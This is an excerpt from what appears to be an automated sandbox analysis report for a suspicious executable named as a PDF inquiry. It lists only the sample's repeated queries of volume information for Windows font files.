          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
